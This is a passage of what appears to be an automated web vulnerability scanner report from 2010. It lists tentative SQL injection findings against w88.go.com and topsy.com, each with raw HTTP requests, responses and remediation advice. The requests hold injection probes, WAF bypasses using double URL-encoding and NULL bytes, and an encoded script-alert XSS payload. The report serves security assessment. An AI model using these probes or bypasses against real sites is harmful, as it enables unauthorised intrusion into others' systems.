<link rel="search" type="application/opensearchdescription+xml" title="Topsy Search" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/opensearch.xml"/> <link rel="stylesheet" type="text/css" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/css/topsy-all.css"/>
<script type="text/javascript" src="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/js/topsy-all.js"></script>

<!--[if IE 7]>
<link rel="stylesheet" type="text/css" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/css/ie7.css"/>
<![endif]-->

<script type="text/javascript" id="topsy_global_settings">
var topsy_style = "small";
var topsy_nick = "TopsyRT";
v
...[SNIP]...

Request 2

GET /top HTTP/1.1
Host: topsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=17886169'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Length: 13102
Content-Type: text/html; charset=utf-8
Expires: Sat, 06 Nov 2010 10:27:36 -0700
Set-Cookie: topsy_session=dd03205bd523bf59969d031d45031be51ffb538f; path=/; expires=Sat, 13-Nov-2010 17:22:36 GMT; HttpOnly
Connection: close
Date: Sat, 06 Nov 2010 17:22:37 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>
Twitter Trackbacks for

http://top/
[top]
on Topsy.com
</title>
<link rel="canonical" href="/top/"/>
<meta name="y_key" content="6ce439d53087ec3f"/>
<meta name="viewport" content="width=device-width"/>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="chrome=1"/>
<meta name="msvalidate.01" content="CAE426C8C3272CF554246FC747D6F96D"/>
<link rel="icon" type="image/png" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/img/favico.png"/>
<link rel="shortcut icon" type="image/x-icon" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/img/favico.png"/>
<link rel="search" type="application/opensearchdescription+xml" title="Topsy Search" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/opensearch.xml"/> <link rel="stylesheet" type="text/css" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/css/topsy-all.css"/>
<script type="text/javascript" src="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/js/topsy-all.js"></script>

<!--[if IE 7]>
<link rel="stylesheet" type="text/css" href="http://cdn1.topsy.com/asset/master.28620.f1e6f0a6dd/css/ie7.css"/>
<![endif]-->

<script type="text/javascript" id="topsy_global_settings">
var topsy_style = "small";
var topsy_nick = "TopsyRT";
var topsy_order = "count,badge";
var topsy_streaming = "on";
</script>
<script type="text/javascript" src="http://cdn.topsy.com/topsy.js?init=topsyWidgetCreator"></script>
<me
...[SNIP]...

2.7. http://w88.go.com/b/ss/wdgesp360,wdgespge/1/H.21/s24528802135027 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgesp360,wdgespge/1/H.21/s24528802135027

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/wdgesp360,wdgespge/1/H.21/s24528802135027 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289020670509; CRBLM_LAST_UPDATE=1289019281; mbox=session#1289020509579-435223#1289022526|check#true#1289020726; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020671418%7C1383628671418%3B%20s_c24_s%3DFirst%2520Visit%7C1289022471418%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022471431%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 07 Nov 2010 00:43:55 GMT
Server: Omniture DC/2.0.0
Content-Length: 437
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/wdgesp360,wdgespge/1/H.21/s24528802135027 wa
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/wdgesp360,wdgespge/1/H.21/s24528802135027 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289020670509; CRBLM_LAST_UPDATE=1289019281; mbox=session#1289020509579-435223#1289022526|check#true#1289020726; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020671418%7C1383628671418%3B%20s_c24_s%3DFirst%2520Visit%7C1289022471418%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022471431%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 07 Nov 2010 00:43:55 GMT
Server: Omniture DC/2.0.0
xserver: www600
Content-Length: 0
Content-Type: text/html
Connection: close


2.8. http://w88.go.com/b/ss/wdgespcom,wdgespge/1/H.21/s2139151592738 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgespcom,wdgespge/1/H.21/s2139151592738

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/wdgespcom,wdgespge/1/H.21%00'/s2139151592738 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 17:28:33 GMT
Server: Omniture DC/2.0.0
Content-Length: 418
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/wdgespcom,wdgespge/1/H.21 was not found on this
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/wdgespcom,wdgespge/1/H.21%00''/s2139151592738 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 17:28:33 GMT
Server: Omniture DC/2.0.0
xserver: www404
Content-Length: 0
Content-Type: text/html
Connection: close


2.9. http://w88.go.com/b/ss/wdgespcom,wdgespge/1/H.21/s27365652576554 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgespcom,wdgespge/1/H.21/s27365652576554

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/wdgespcom,wdgespge/1/H.21/s27365652576554%00' HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289020670509; CRBLM_LAST_UPDATE=1289019281; mbox=session#1289020509579-435223#1289022526|check#true#1289020726; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020671418%7C1383628671418%3B%20s_c24_s%3DFirst%2520Visit%7C1289022471418%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022471431%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 07 Nov 2010 00:44:37 GMT
Server: Omniture DC/2.0.0
Content-Length: 434
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/wdgespcom,wdgespge/1/H.21/s27365652576554 was n
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/wdgespcom,wdgespge/1/H.21/s27365652576554%00'' HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289020670509; CRBLM_LAST_UPDATE=1289019281; mbox=session#1289020509579-435223#1289022526|check#true#1289020726; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020671418%7C1383628671418%3B%20s_c24_s%3DFirst%2520Visit%7C1289022471418%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022471431%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 07 Nov 2010 00:44:38 GMT
Server: Omniture DC/2.0.0
xserver: www600
Content-Length: 0
Content-Type: text/html
Connection: close


2.10. http://w88.go.com/b/ss/wdgespcom,wdgespge/1/H.21/s28015880165621 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgespcom,wdgespge/1/H.21/s28015880165621

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/wdgespcom,wdgespge/1/H.21%00'/s28015880165621 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289020670509; CRBLM_LAST_UPDATE=1289019281; mbox=session#1289020509579-435223#1289022526|check#true#1289020726; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020671418%7C1383628671418%3B%20s_c24_s%3DFirst%2520Visit%7C1289022471418%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022471431%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 07 Nov 2010 00:44:36 GMT
Server: Omniture DC/2.0.0
Content-Length: 418
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/wdgespcom,wdgespge/1/H.21 was not found on this
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/wdgespcom,wdgespge/1/H.21%00''/s28015880165621 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; fsr.a=1289020670509; CRBLM_LAST_UPDATE=1289019281; mbox=session#1289020509579-435223#1289022526|check#true#1289020726; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020671418%7C1383628671418%3B%20s_c24_s%3DFirst%2520Visit%7C1289022471418%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022471431%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; SEEN2=cAMLBtEOcAMLBtEOcAMLBtEO:;

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 07 Nov 2010 00:44:36 GMT
Server: Omniture DC/2.0.0
xserver: www404
Content-Length: 0
Content-Type: text/html
Connection: close


2.11. http://w88.go.com/b/ss/wdgespcom,wdgespge/1/H.21/s28144118890631 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgespcom,wdgespge/1/H.21/s28144118890631

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/wdgespcom,wdgespge%00'/1/H.21/s28144118890631 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 17:29:16 GMT
Server: Omniture DC/2.0.0
Content-Length: 411
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/wdgespcom,wdgespge was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/wdgespcom,wdgespge%00''/1/H.21/s28144118890631 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
